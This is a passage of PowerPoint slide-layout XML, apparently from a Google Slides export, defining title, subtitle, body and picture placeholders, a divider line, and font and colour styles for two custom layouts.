              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr>
                <a:solidFill>
                  <a:srgbClr val="000D74"/>
                </a:solidFill>
                <a:latin typeface="Didact Gothic"/>
                <a:ea typeface="Didact Gothic"/>
                <a:cs typeface="Didact Gothic"/>
                <a:sym typeface="Didact Gothic"/>
              </a:defRPr>
            </a:lvl5pPr>
            <a:lvl6pPr lvl="5" rtl="0" algn="r">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr>
                <a:solidFill>
                  <a:srgbClr val="000D74"/>
                </a:solidFill>
                <a:latin typeface="Didact Gothic"/>
                <a:ea typeface="Didact Gothic"/>
                <a:cs typeface="Didact Gothic"/>
                <a:sym typeface="Didact Gothic"/>
              </a:defRPr>
            </a:lvl6pPr>
            <a:lvl7pPr lvl="6" rtl="0" algn="r">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr>
                <a:solidFill>
                  <a:srgbClr val="000D74"/>
                </a:solidFill>
                <a:latin typeface="Didact Gothic"/>
                <a:ea typeface="Didact Gothic"/>
                <a:cs typeface="Didact Gothic"/>
                <a:sym typeface="Didact Gothic"/>
              </a:defRPr>
            </a:lvl7pPr>
            <a:lvl8pPr lvl="7" rtl="0" algn="r">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr>
                <a:solidFill>
                  <a:srgbClr val="000D74"/>
                </a:solidFill>
                <a:latin typeface="Didact Gothic"/>
                <a:ea typeface="Didact Gothic"/>
                <a:cs typeface="Didact Gothic"/>
                <a:sym typeface="Didact Gothic"/>
              </a:defRPr>
            </a:lvl8pPr>
            <a:lvl9pPr lvl="8" rtl="0" algn="r">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr>
                <a:solidFill>
                  <a:srgbClr val="000D74"/>
                </a:solidFill>
                <a:latin typeface="Didact Gothic"/>
                <a:ea typeface="Didact Gothic"/>
                <a:cs typeface="Didact Gothic"/>
                <a:sym typeface="Didact Gothic"/>
              </a:defRPr>
            </a:lvl9pPr>
          </a:lstStyle>
          <a:p/>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="250" name="Google Shape;250;p24"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="630769" y="730497"/>
            <a:ext cx="8511900" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln cap="flat" cmpd="sng" w="21425">
            <a:solidFill>
              <a:srgbClr val="B9D8EB"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd len="med" w="med" type="none"/>
            <a:tailEnd len="med" w="med" type="none"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="251" name="Google Shape;251;p24"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="629175" y="0"/>
            <a:ext cx="8514900" cy="689100"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="b" bIns="34275" lIns="68575" spcFirstLastPara="1" rIns="68575" wrap="square" tIns="34275">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr lvl="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr sz="2300">
                <a:solidFill>
                  <a:srgbClr val="000D74"/>
                </a:solidFill>
                <a:latin typeface="Inter ExtraLight"/>
                <a:ea typeface="Inter ExtraLight"/>
                <a:cs typeface="Inter ExtraLight"/>
                <a:sym typeface="Inter ExtraLight"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr lvl="1" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr sz="2300"/>
            </a:lvl2pPr>
            <a:lvl3pPr lvl="2" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr sz="2300"/>
            </a:lvl3pPr>
            <a:lvl4pPr lvl="3" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr sz="2300"/>
            </a:lvl4pPr>
            <a:lvl5pPr lvl="4" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr sz="2300"/>
            </a:lvl5pPr>
            <a:lvl6pPr lvl="5" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr sz="2300"/>
            </a:lvl6pPr>
            <a:lvl7pPr lvl="6" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr sz="2300"/>
            </a:lvl7pPr>
            <a:lvl8pPr lvl="7" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr sz="2300"/>
            </a:lvl8pPr>
            <a:lvl9pPr lvl="8" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr sz="2300"/>
            </a:lvl9pPr>
          </a:lstStyle>
          <a:p/>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="252" name="Google Shape;252;p24"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="8" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="630769" y="714900"/>
            <a:ext cx="3398700" cy="438000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="68575" lIns="68575" spcFirstLastPara="1" rIns="68575" wrap="square" tIns="68575">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr lvl="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="0072CE"/>
              </a:buClr>
              <a:buSzPts val="1700"/>
              <a:buFont typeface="Inter"/>
              <a:buNone/>
              <a:defRPr b="1" sz="1600">
                <a:solidFill>
                  <a:srgbClr val="0072CE"/>
                </a:solidFill>
                <a:latin typeface="Inter"/>
                <a:ea typeface="Inter"/>
                <a:cs typeface="Inter"/>
                <a:sym typeface="Inter"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr lvl="1" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buNone/>
              <a:defRPr>
                <a:latin typeface="Inter Light"/>
                <a:ea typeface="Inter Light"/>
                <a:cs typeface="Inter Light"/>
                <a:sym typeface="Inter Light"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr lvl="2" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buNone/>
              <a:defRPr>
                <a:latin typeface="Inter Light"/>
                <a:ea typeface="Inter Light"/>
                <a:cs typeface="Inter Light"/>
                <a:sym typeface="Inter Light"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr lvl="3" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buNone/>
              <a:defRPr>
                <a:latin typeface="Inter Light"/>
                <a:ea typeface="Inter Light"/>
                <a:cs typeface="Inter Light"/>
                <a:sym typeface="Inter Light"/>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr lvl="4" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buNone/>
              <a:defRPr>
                <a:latin typeface="Inter Light"/>
                <a:ea typeface="Inter Light"/>
                <a:cs typeface="Inter Light"/>
                <a:sym typeface="Inter Light"/>
              </a:defRPr>
            </a:lvl5pPr>
            <a:lvl6pPr lvl="5" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buNone/>
              <a:defRPr>
                <a:latin typeface="Inter Light"/>
                <a:ea typeface="Inter Light"/>
                <a:cs typeface="Inter Light"/>
                <a:sym typeface="Inter Light"/>
              </a:defRPr>
            </a:lvl6pPr>
            <a:lvl7pPr lvl="6" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buNone/>
              <a:defRPr>
                <a:latin typeface="Inter Light"/>
                <a:ea typeface="Inter Light"/>
                <a:cs typeface="Inter Light"/>
                <a:sym typeface="Inter Light"/>
              </a:defRPr>
            </a:lvl7pPr>
            <a:lvl8pPr lvl="7" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buNone/>
              <a:defRPr>
                <a:latin typeface="Inter Light"/>
                <a:ea typeface="Inter Light"/>
                <a:cs typeface="Inter Light"/>
                <a:sym typeface="Inter Light"/>
              </a:defRPr>
            </a:lvl8pPr>
            <a:lvl9pPr lvl="8" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buNone/>
              <a:defRPr>
                <a:latin typeface="Inter Light"/>
                <a:ea typeface="Inter Light"/>
                <a:cs typeface="Inter Light"/>
                <a:sym typeface="Inter Light"/>
              </a:defRPr>
            </a:lvl9pPr>
          </a:lstStyle>
          <a:p/>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="253" name="Google Shape;253;p24"/>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_PhotoL">
  <p:cSld name="Custom Layout_2">
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="254" name="Shape 254"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="255" name="Google Shape;255;p25"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4357596" y="1470863"/>
            <a:ext cx="3778800" cy="2664600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="34275" lIns="68575" spcFirstLastPara="1" rIns="68575" wrap="square" tIns="34275">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr indent="-317500" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="800"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1400"/>
              <a:buChar char="•"/>
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr indent="-317500" lvl="1" marL="914400" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1400"/>
              <a:buChar char="o"/>
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr indent="-317500" lvl="2" marL="1371600" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1400"/>
              <a:buChar char="—"/>
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr indent="-317500" lvl="3" marL="1828800" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1400"/>
              <a:buChar char="•"/>
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr indent="-317500" lvl="4" marL="2286000" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1400"/>
              <a:buChar char="•"/>
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl5pPr>
            <a:lvl6pPr indent="-317500" lvl="5" marL="2743200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:lvl6pPr>
            <a:lvl7pPr indent="-317500" lvl="6" marL="3200400" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:lvl7pPr>
            <a:lvl8pPr indent="-317500" lvl="7" marL="3657600" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:lvl8pPr>
            <a:lvl9pPr indent="-317500" lvl="8" marL="4114800" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:lvl9pPr>
          </a:lstStyle>
          <a:p/>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="256" name="Google Shape;256;p25"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="0" l="23843" r="23843" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="-5812"/>
            <a:ext cx="3723433" cy="4743880"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="257" name="Google Shape;257;p25"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="2" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4051119" y="4738069"/>
            <a:ext cx="4460700" cy="438000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="ctr" bIns="68575" lIns="68575" spcFirstLastPara="1" rIns="68575" wrap="square" tIns="68575">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr>
                <a:solidFill>
                  <a:srgbClr val="000D74"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr lvl="1" rtl="0" algn="r">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr>
                <a:solidFill>
                  <a:srgbClr val="000D74"/>
                </a:solidFill>
                <a:latin typeface="Didact Gothic"/>
                <a:ea typeface="Didact Gothic"/>
                <a:cs typeface="Didact Gothic"/>
                <a:sym typeface="Didact Gothic"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr lvl="2" rtl="0" algn="r">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr>
                <a:solidFill>
                  <a:srgbClr val="000D74"/>
                </a:solidFill>
                <a:latin typeface="Didact Gothic"/>
                <a:ea typeface="Didact Gothic"/>
                <a:cs typeface="Didact Gothic"/>
                <a:sym typeface="Didact Gothic"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr lvl="3" rtl="0" algn="r">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr>
                <a:solidFill>
                  <a:srgbClr val="000D74"/>
                </a:solidFill>
                <a:latin typeface="Didact Gothic"/>
                <a:ea typeface="Didact Gothic"/>
                <a:cs typeface="Didact Gothic"/>
                <a:sym typeface="Didact Gothic"/>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr lvl="4" rtl="0" algn="r">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr>
                <a:solidFill>
                  <a:srgbClr val="000D74"/>
                </a:solidFill>
                <a:latin typeface="Didact Gothic"/>
                <a:ea typeface="Didact Gothic"/>
                <a:cs typeface="Didact Gothic"/>
                <a:sym typeface="Didact Gothic"/>
              </a:defRPr>
            </a:lvl5pPr>
            <a:lvl6pPr lvl="5" rtl="0" algn="r">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr>
                <a:solidFill>
                  <a:srgbClr val="000D74"/>
                </a:solidFill>
                <a:latin typeface="Didact Gothic"/>
                <a:ea typeface="Didact Gothic"/>
                <a:cs typeface="Didact Gothic"/>
                <a:sym typeface="Didact Gothic"/>
              </a:defRPr>
            </a:lvl6pPr>
            <a:lvl7pPr lvl="6" rtl="0" algn="r">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr>
                <a:solidFill>
                  <a:srgbClr val="000D74"/>
                </a:solidFill>
                <a:latin typeface="Didact Gothic"/>
                <a:ea typeface="Didact Gothic"/>
                <a:cs typeface="Didact Gothic"/>
                <a:sym typeface="Didact Gothic"/>
              </a:defRPr>
            </a:lvl7pPr>
            <a:lvl8pPr lvl="7" rtl="0" algn="r">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr>
                <a:solidFill>
                  <a:srgbClr val="000D74"/>
                </a:solidFill>
                <a:latin typeface="Didact Gothic"/>
                <a:ea typeface="Didact Gothic"/>
                <a:cs typeface="Didact Gothic"/>
                <a:sym typeface="Didact Gothic"/>
              </a:defRPr>
            </a:lvl8pPr>
            <a:lvl9pPr lvl="8" rtl="0" algn="r">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr>
                <a:solidFill>
                  <a:srgbClr val="000D74"/>
                </a:solidFill>
                <a:latin typeface="Didact Gothic"/>
                <a:ea typeface="Didact Gothic"/>
                <a:cs typeface="Didact Gothic"/>
                <a:sym typeface="Didact Gothic"/>
              </a:defRPr>
            </a:lvl9pPr>
          </a:lstStyle>
          <a:p/>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="258" name="Google Shape;258;p25"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4309181" y="769463"/>
            <a:ext cx="4834800" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln cap="flat" cmpd="sng" w="21425">
            <a:solidFill>
              <a:srgbClr val="B9D8EB"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd len="med" w="med" type="none"/>
            <a:tailEnd len="med" w="med" type="none"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="259" name="Google Shape;259;p25"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4286925" y="38963"/>
            <a:ext cx="6457200" cy="689100"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="b" bIns="34275" lIns="68575" spcFirstLastPara="1" rIns="68575" wrap="square" tIns="34275">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr lvl="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr sz="2300">
                <a:solidFill>
                  <a:srgbClr val="000D74"/>
                </a:solidFill>
                <a:latin typeface="Inter ExtraLight"/>
                <a:ea typeface="Inter ExtraLight"/>
                <a:cs typeface="Inter ExtraLight"/>
                <a:sym typeface="Inter ExtraLight"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr lvl="1" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr sz="2300"/>
            </a:lvl2pPr>
            <a:lvl3pPr lvl="2" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr sz="2300"/>
            </a:lvl3pPr>
            <a:lvl4pPr lvl="3" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr sz="2300"/>
            </a:lvl4pPr>
            <a:lvl5pPr lvl="4" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr sz="2300"/>
            </a:lvl5pPr>
            <a:lvl6pPr lvl="5" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr sz="2300"/>
            </a:lvl6pPr>
            <a:lvl7pPr lvl="6" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr sz="2300"/>
            </a:lvl7pPr>
            <a:lvl8pPr lvl="7" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr sz="2300"/>
            </a:lvl8pPr>
            <a:lvl9pPr lvl="8" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr sz="2300"/>
            </a:lvl9pPr>
          </a:lstStyle>
          <a:p/>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="260" name="Google Shape;260;p25"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="3" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4309181" y="753863"/>
            <a:ext cx="3398700" cy="438000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="68575" lIns="68575" spcFirstLastPara="1" rIns="68575" wrap="square" tIns="68575">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr lvl="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="0072CE"/>
              </a:buClr>
              <a:buSzPts val="1700"/>
              <a:buFont typeface="Inter"/>
              <a:buNone/>
              <a:defRPr b="1" sz="1600">
                <a:solidFill>
                  <a:srgbClr val="0072CE"/>
                </a:solidFill>
                <a:latin typeface="Inter"/>
                <a:ea typeface="Inter"/>
                <a:cs typeface="Inter"/>
                <a:sym typeface="Inter"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr lvl="1" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
